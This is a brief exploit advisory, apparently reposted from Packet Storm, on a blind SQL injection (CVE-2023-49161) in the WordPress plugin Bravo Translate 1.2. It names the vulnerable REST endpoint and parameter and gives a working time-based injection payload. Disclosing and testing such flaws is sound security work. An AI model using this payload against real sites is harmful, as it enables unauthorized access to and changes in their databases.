WordPress Bravo Translate 1.2 SQL Injection
2023-12-11 23:28:0 Author: packetstormsecurity.com(查看原文) 阅读量:6 收藏

# Exploit Title: WP Plugins Bravo Translate <= 1.2 - SQL Injection
# Date: 09-12-2023
# Exploit Author: Arvandy
# Software Link: https://wordpress.org/plugins/bravo-translate/
# Version: 1.2
# Tested on: Windows, Linux
# CVE: CVE-2023-49161

# Product Description
This plugin allow you to translate your monolingual website in a super easy manner. You do not have to bother about .pot .po or .mo files. It safes you a lot of time cause you can effectively transalte thouse texts in a foreign language with just a few clicks gaining productivity. Bravo translate keeps your translations in your database. You dont have to worry about themes or plugins updates because your translations will not vannish.

# Vulnerability overview:
The WordPress Plugins Bravo Translate <= 1.2 is vulnerable to Blind SQL Injection via the textTo parameter on /wp-json/bravo-translate/BRAVOTRAN_create endpoint. This vulnerability could lead to unauthorized data access and modification.

# Proof of Concept:
Affected Endpoint: /wp-json/bravo-translate/BRAVOTRAN_create?textTo=a&yourTranslation=b
Affected Parameter: textTo
payload: test',(select%20sleep(5)))%23

# Recommendation
N/A


文章来源: https://packetstormsecurity.com/files/176137/wpbravotranslate12-sql.txt
如有侵权请联系:admin#unsafe.sh